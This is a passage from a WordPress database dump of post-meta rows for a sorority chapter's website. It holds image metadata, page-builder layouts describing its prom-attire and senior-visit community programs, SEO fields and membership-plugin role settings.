T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476644781\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"21\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3790,956,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(3181,772,'post_settings',NULL),(3195,780,'_wp_attached_file','2017/01/rsz_wineshop_at_home_logo_pms_highres-1.jpg'),(3196,780,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:263;s:6:\"height\";i:128;s:4:\"file\";s:51:\"2017/01/rsz_wineshop_at_home_logo_pms_highres-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"rsz_wineshop_at_home_logo_pms_highres-1-150x128.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:51:\"rsz_wineshop_at_home_logo_pms_highres-1-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:51:\"rsz_wineshop_at_home_logo_pms_highres-1-180x128.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3201,782,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:100;s:4:\"file\";s:17:\"2017/01/becca.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"becca-150x100.png\";s:5:\"width\";i:150;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"becca-180x100.png\";s:5:\"width\";i:180;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"becca-180x100.png\";s:5:\"width\";i:180;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3200,782,'_wp_attached_file','2017/01/becca.png'),(3199,781,'_edit_last','1'),(3197,781,'ts_use_template','1'),(3198,781,'_edit_lock','1536999503:1'),(3204,781,'ts_template','a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:4:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:4:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:60:\"https://zphiblgz.org/wp-content/uploads/2017/01/APPALogo.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:27:\"A Pretty & Polished Affair \";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:16:\"lineariconcenter\";s:4:\"size\";s:2:\"h1\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1887:\"<p>Prom is a celebration of years of friendships and hard work in high school and every young woman deserves to attend it looking her best. We want to make a few high school students’ dreams come true, regardless of their financial situation. </p><p>In 2014 LGZ launched <strong><span style=--quote--color: #2341a5;--quote-->A Pretty and Polished Affair</span> </strong>to ensure that each girl in Howard County, MD had the opportunity to feel beautiful on their special day. The event provides a full boutique experience for each young lady including a personal shopper to help them with their dress and accessories, basic alterations, hair and makeup tips and the opportunity to win raffled prizes. The event is free of cost and is held each year prior to prom season. Although the event is held in Howard County, young ladies are welcomed from neighboring counties. <a href=--quote--https://zphiblgz.org/wp-content/uploads/2017/01/becca.png--quote--><img class=--quote--size-full wp-image-782 alignright--quote-- src=--quote--https://zphiblgz.org/wp-content/uploads/2017/01/becca.png--quote-- alt=--quote--becca--quote-- width=--quote--200--quote-- height=--quote--100--quote-- /></a></p><p>In 2017, LGZ made a very important partnership with Altholton High School\'s chapter of <strong><span style=--quote--color: #ff99cc;--quote-->Becca\'s Closet.</span></strong> Becca\'s Closet is an organization who has worked tirelessly to provide young women around the country the prom attire they deserve. </p><h4>Donors &amp; Community Partners</h4><p>Each year we accept donations of gently worn formal attire, shoes, and accessories and donations of gift cards and services. If you would like to contribute or become an event donor or community partner contact us at <span style=--quote--color: #2341a5;--quote-->appa@zphiblgz.org</span>, for more information. </p><p> </p><p> </p>\";s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}}}i:3;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:1:{s:4:\"type\";s:5:\"empty\";}}}}}}'),(5263,781,'_rawhtml_settings','0,0,0,0'),(5264,1326,'_wp_attached_file','2018/09/Ballbanner.png'),(5265,1326,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:650;s:4:\"file\";s:22:\"2018/09/Ballbanner.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Ballbanner-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Ballbanner-300x102.png\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Ballbanner-768x260.png\";s:5:\"width\";i:768;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Ballbanner-1024x347.png\";s:5:\"width\";i:1024;s:6:\"height\";i:347;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Ballbanner-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"Ballbanner-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"Ballbanner-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"Ballbanner-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4380,1154,'_wp_attached_file','2016/12/Youth.png'),(4381,1154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:500;s:4:\"file\";s:17:\"2016/12/Youth.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Youth-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Youth-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"Youth-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"Youth-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:17:\"Youth-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:17:\"Youth-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"Youth-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4387,1158,'_wp_attached_file','2014/12/voterlogo.png'),(4388,1158,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:21:\"2014/12/voterlogo.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"voterlogo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"voterlogo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"voterlogo-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:21:\"voterlogo-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:21:\"voterlogo-512x300.png\";s:5:\"width\";i:512;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"voterlogo-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4391,1160,'_wp_attached_file','2016/12/AmicetteInformational-1.png'),(4392,1160,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:672;s:4:\"file\";s:35:\"2016/12/AmicetteInformational-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"AmicetteInformational-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"AmicetteInformational-1-214x300.png\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"AmicetteInformational-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"AmicetteInformational-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"AmicetteInformational-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"AmicetteInformational-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3211,786,'ts_use_template','1'),(3212,786,'_edit_lock','1505406952:1'),(3209,785,'_wp_attached_file','2017/01/Table1.png'),(3210,785,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:18:\"2017/01/Table1.png\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Table1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Table1-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"Table1-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"Table1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:18:\"Table1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:18:\"Table1-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"Table1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"Table1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"Table1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"Table1-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3208,781,'post_settings',NULL),(3207,781,'page_settings','a:5:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:2:\"no\";}'),(3205,781,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(3206,781,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(3214,786,'ts_template','a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:60;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:5:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:68:\"https://zphiblgz.org/wp-content/uploads/2017/09/2017FinalZenLogo.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:32:\"Zetas  & Elders Engaging (Z.E.N)\";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:16:\"lineariconcenter\";s:4:\"size\";s:2:\"h1\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:600:\"<p>Lambda Gamma Zeta is dedicated to the national Z-HOPE initiative and brings those initiatives to the Howard County community. On January 16, 2017 LGZ launched its newest program Z.E.N, Zetas and Elders Engaging. The program allows LGZ to visit various senior care facilities in Howard County to  provide games, puzzles, and other recreation items as well as spend time and support the elders within the community.       </p><p>For more information about this program or to provide us with information about elder facilities that could benefit from Z.E.N, contact us at zen@zphiblgz.org</p>\";s:11:\"admin-label\";s:0:\"\";}i:4;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:60;s:11:\"admin-label\";s:0:\"\";}}}}}}'),(4385,1157,'_wp_attached_file','2014/12/zhopelogo.jpg'),(4386,1157,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:494;s:6:\"height\";i:316;s:4:\"file\";s:21:\"2014/12/zhopelogo.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"zhopelogo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"zhopelogo-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"zhopelogo-400x316.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:21:\"zhopelogo-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:21:\"zhopelogo-494x300.jpg\";s:5:\"width\";i:494;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"zhopelogo-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3713,786,'_yoast_wpseo_focuskw_text_input','Elders'),(3714,786,'_yoast_wpseo_focuskw','Elders'),(3715,786,'_yoast_wpseo_metadesc','Lambda Gamma Zeta partners with various elder care facilities in Howard County to provide companionship and fun to the seniors in the community.'),(3716,786,'_yoast_wpseo_linkdex','31'),(3717,786,'_yoast_wpseo_content_score','30'),(3213,786,'_edit_last','1'),(3169,768,'_thumbnail_id','769'),(3170,769,'PdfThumbnailsPlugin','1'),(3172,771,'_wp_attached_file','2016/12/amicette.png'),(3178,772,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(2042,561,'_um_checkmail_message','Thank you for registering. Before you can login we need you to activate your account by clicking the activation link in the email we just sent you.'),(2041,561,'_um_checkmail_action','show_message'),(2040,561,'_um_login_email_activate','0'),(2033,562,'_um_after_logout','redirect_home'),(2032,562,'_um_after_login','redirect_profile'),(2031,562,'_um_auto_approve_act','redirect_profile'),(2030,562,'_um_status','approved'),(2029,562,'_um_default_homepage','1'),(2028,562,'_um_can_access_private_profile','0'),(2027,562,'_um_can_make_private_profile','0'),(2026,562,'_um_can_view_all','1'),(2025,562,'_um_can_delete_profile','1'),(2024,562,'_um_can_edit_profile','1'),(2023,562,'_um_can_delete_everyone','0'),(2022,562,'_um_can_edit_everyone','0'),(2021,562,'_um_can_not_see_adminbar','1'),(2020,562,'_um_can_access_wpadmin','0'),(2019,562,'_um_core','member'),(2018,561,'_um_after_logout','redirect_home'),(2017,561,'_um_after_login','redirect_profile'),(2016,561,'_um_auto_approve_act','redirect_profile'),(2015,561,'_um_status','pending'),(2014,561,'_um_default_homepage','1'),(2013,561,'_um_can_access_private_profile','1'),(2012,561,'_um_can_make_private_profile','1'),(2011,561,'_um_can_view_all','1'),(2010,561,'_um_can_delete_profile','1'),(2009,561,'_um_can_edit_profile','1'),(2008,561,'_um_can_delete_everyone','1'),(2007,561,'_um_can_edit_everyone','1'),(2006,561,'_um_can_not_see_adminbar','0'),(2005,561,'_um_can_access_wpadmin','1'),(2004,561,'_um_core','admin'),(2039,561,'_um_auto_approve_url',''),(2038,561,'_um_redirect_homepage',''),(4447,1179,'_wp_attached_file','2017/01/Soror-Conway1.png'),(2037,561,'_um_synced_role','administrator'),(2036,561,'_edit_last','1'),(2035,561,'ts_template','a:0:{}'),(2034,561,'_edit_lock','1480701751:1'),(1989,546,'_um_core','members'),(1988,546,'_um_profiles_per_page_mobile','6'),(1987,546,'_um_profiles_per_page','12'),(1986,546,'_um_directory_no_users','We are sorry. We cannot find any users who match your search criteria.'),(1985,546,'_um_directory_header_single','{total_users} Member'),(1984,546,'_um_directory_header','{total_users} Members'),(1983,546,'_um_show_name','1'),(1982,546,'_um_cover_photos','1'),(1981,546,'_um_profile_photo','1'),(1980,546,'_um_sortby','user_registered_desc'),(1979,546,'_um_userinfo_animate','1'),(1978,546,'_um_search','0'),(1977,546,'_um_show_tagline','0'),(1976,546,'_um_show_userinfo','0'),(1975,546,'_um_show_social','0'),(1974,546,'_um_has_cover_photo','0'),(1973,546,'_um_has_profile_photo','0'),(1972,546,'_um_mode','directory'),(1971,546,'_um_template','members'),(1970,545,'_um_profile_use_globals','1'),(1969,545,'_um_core','profile'),(1968,545,'_um_mode','profile'),(1967,545,'_um_custom_fields','a:1:{s:9:\"_um_row_1\";a:4:{s:4:\"type\";s:3:\"row\";s:2:\"id\";s:9:\"_um_row_1\";s:8:\"sub_rows\";s:1:\"1\";s:4:\"cols\";s:1:\"1\";}}'),(1966,544,'_um_login_use_globals','1'),(1965,544,'_um_core','login'),(1964,544,'_um_mode','login'),(1963,544,'_um_custom_fields','a:3:{s:8:\"username\";a:13:{s:5:\"title\";s:18:\"Username or E-mail\";s:7:\"metakey\";s:8:\"username\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:18:\"Username or E-mail\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:0;s:8:\"validate\";s:24:\"unique_username_or_email\";s:8:\"position\";s:1:\"1\";s:6:\"in_row\";s:9:\"_um_row_1\";s:10:\"in_sub_row\";s:1:\"0\";s:9:\"in_column\";s:1:\"1\";s:8:\"in_group\";s:0:\"\";}s:13:\"user_password\";a:16:{s:5:\"title\";s:8:\"Password\";s:7:\"metakey\";s:13:\"user_password\";s:4:\"type\";s:8:\"password\";s:5:\"label\";s:8:\"Password\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:9:\"min_chars\";i:8;s:9:\"max_chars\";i:30;s:15:\"force_good_pass\";i:1;s:18:\"force_confirm_pass\";i:1;s:8:\"position\";s:1:\"2\";s:6:\"in_row\";s:9:\"_um_row_1\";s:10:\"in_sub_row\";s:1:\"0\";s:9:\"in_column\";s:1:\"1\";s:8:\"in_group\";s:0:\"\";}s:9:\"_um_row_1\";a:5:{s:4:\"type\";s:3:\"row\";s:2:\"id\";s:9:\"_um_row_1\";s:8:\"sub_rows\";s:1:\"1\";s:4:\"cols\";s:1:\"1\";s:6:\"origin\";s:9:\"_um_row_1\";}}'),(1962,543,'_um_registe